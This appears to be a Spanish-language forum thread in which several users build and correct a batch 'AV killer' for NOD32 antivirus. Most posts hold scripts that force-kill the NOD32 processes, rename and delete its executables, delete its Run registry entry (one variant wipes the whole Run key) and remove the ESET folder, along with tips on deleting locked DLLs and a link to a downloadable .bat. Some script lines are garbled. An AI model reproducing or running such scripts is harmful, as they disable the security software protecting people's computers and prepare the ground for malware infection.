Duada sobre avkiller para nod32

[elfuede]

Que tal colegas? espero q todo muy bien.
Voy a mi duda, he creado un av killer en batch para nod32
pero me gustaria saber la direccion de las claves en el registro sobre este AV
y como podria indicarle a mi programa para q las elemine.
Desde ya muchas gracias
Los saludo atentamente

[ivansillo]

HKLM/software/microsoft/windows/currentversion/run

espero te sirva mi informacion

*no recuerdo como se borra exactamente el registro pero es con "reg del"

pd. cuanto termines tu av killer postealo porque me seria de gran utilidad ya que yo intente hacer uno pero no me salio muy bien (esque soy novato)

gracias de antemano y suerte

[onixessk8]

OLA
El nod32 tiene un problema y es que cuanod cierras el proceso nod32kui.exe no se vuelve a abrir pero!queda uno en segundo plano que es nod32krn.exe quer si lo cierras se vuelve a abrir entonces..yo lo que hago es cerrarlo y cambiarle el nombre inmediatamente y lo eliminas esta en: C:\Archivos de programa\ESET\nod32krn.exe
Luego lo borras del registro que te voy a pasar donde es:
HKEY_LOCAL_MAC HINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
creo que es el registro que han puesto antes..
el code seria algo asi..

Código:

@echo off
taskkill /f /im nod32kui.exe
taskkill /f /im nod32krn.exe
ren "%programfiles%\eset\nod32kui.exe" ola.exe
del /q /s /f "%programfiles%\eset\ola.exe"
::Esto no se si esta bien porque no contorlo mucho los resgistros :S
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"nod32kui.exe /ve /f
::Y luego si quieres borras toda la carpeta del nod32
del /f /s /q "%programfiles%\ESET\*.*"
echo adios nod32!
pause
exit

Bueno creo que es asi lo e hecho en momento corregidlo si falla algo!
saludosss

[ivansillo]

yo creoque el code ya terminado y corregido (creo que lo corregi bien) quedaria asi:

@echo off
taskkill /im nod32kui.exe /f
taskkill /im nod32krn.exe /f
taskkill /im nvsvc32.exe  /f
ren "%programfiles%\eset\nod32kui.exe" ola.exe
del /q /s /f "%programfiles%\eset\ola.exe"
reg delete "HKEY_LOCAL_MAC HINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" /v nod32kui.exe /f
rd "%programfiles%\ESET" /s /q

espero que funcione bien 
suerte


en este mensaje no sale una de las lineas completas
mejor bajense el .bat desde el link que puse mas abajo

[PyXOLo]

Bien hecho alex pero...

@echo off
taskkill /f /im nod32kui.exe
taskkill /f /im nod32krn.exe
ren "%programfiles%\eset\nod32kui.exe" "%programfiles%\eset\wrong.pyx"
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
::Así borras todo el RUN
::Y luego si quieres borras toda la carpeta del nod32
del /f /s /q "%programfiles%\ESET\*.*"
goto EOF

[ivansillo]

no me llamo alex , y el error que tuve fue porque se me olvido poner lo demas 

perdon

[PyXOLo]

no me llamo alex , y el error que tuve fue porque se me olvido poner lo demas 

perdon

perdon, pero quise citar a onixessk8, que él sí se llama Alex xD

[onixessk8]

Ok gracias por corregir esque no tenia ganas de pensar..xD y lo hice asi de una!xD
saludos espero que te halla servido

[ivansillo]

ok perdon

mi codigo del av killer esta un poco largo y no sale en el mensaje la linea completa, mejor bajate el .bat lo acabo de subir y ahi me corrigen si tiene algo mal (espero que no este mal)


Para ver este enlace Registrate o Inicia Sesion

[onixessk8]

Una cosa no entiendo:S pyxolo porque le pones de nombre wrong.pyx y luego eliminas el ola.exe..
y si borras todo el run no se borran todas las entradas del regsitro run?si no quiero borrarlo todo como se debe poner para borrar solo ese?
saludoss

[PyXOLo]

Ahora que me doy cuenta....

del /f /s /q "%programfiles%\ESET\*.*"

No podrás borrar todos los archivos porque existen .dlls que no se pueden borrar. Primero debes renombrarlas y luego proceder a borrarlas para luego poder usar el rd si se quiere

[onixessk8]

ya.. pero con que elimines algunos te sobra para que no funcione! 
saluddosss

[PyXOLo]

Una cosa no entiendo:S pyxolo porque le pones de nombre wrong.pyx y luego eliminas el ola.exe..
y si borras todo el run no se borran todas las entradas del regsitro run?si no quiero borrarlo todo como se debe poner para borrar solo ese?
saludoss

No me di cuenta de modificar el del del archivo ola.exe que, además es innecesario.

Sobre lo de reg delete seria como reg add pero con delete....

Ejemplo:

reg delete HKKL\Software\Microsoft\Windows\CurrentVersion\Run /v subclave /f

Por ejemplo si no supiéramos el nombre de la subclave podrías hacer una cosa más compleja con reg export for y set

[elfuede]

gracias por la ayuda muchachos
voy a intntar probar haber q sale
si se les ocurre algun otro ejemplo posteen
gracias